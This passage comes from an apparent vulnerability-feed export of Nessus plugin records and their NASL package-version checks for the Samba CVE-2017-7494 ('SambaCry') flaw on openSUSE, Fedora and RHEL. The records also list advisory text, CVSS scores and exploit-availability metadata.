!~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-tests-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-tests-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-atsvc-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-atsvc0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-atsvc0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-binding0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-standard-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-standard0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-standard0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-policy-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-policy0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-policy0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-client-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-client-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-core-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-debugsource-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-libs-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-libs-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-pidl-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-python-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-python-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-winbind-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-winbind-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libregistry0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-33.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-devel / ctdb-tests / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:26", "description": "Security fix for CVE-2017-7494\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-30T00:00:00", "title": "Fedora 25 : 2:samba (2017-642a0eca75) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-30T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2017-642A0ECA75.NASL", "href": "https://www.tenable.com/plugins/nessus/100490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-642a0eca75.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100490);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"FEDORA\", value:\"2017-642a0eca75\");\n\n script_name(english:\"Fedora 25 : 2:samba (2017-642a0eca75) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-7494\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-642a0eca75\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"samba-4.5.10-0.fc25\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T05:39:25", "description": "An update for samba3x is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "RHEL 5 : samba3x (RHSA-2017:1272) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba3x-winbind", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba3x-common", "p-cpe:/a:redhat:enterprise_linux:samba3x-doc", "p-cpe:/a:redhat:enterprise_linux:samba3x-swat", "p-cpe:/a:redhat:enterprise_linux:samba3x-client", "p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba3x", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel"], "id": "REDHAT-RHSA-2017-1272.NASL", "href": "https://www.tenable.com/plugins/nessus/100452", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1272. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100452);\n script_version(\"3.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1272\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2017:1272) (SambaCry)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba3x is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2017-7494.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/3034621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7494\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 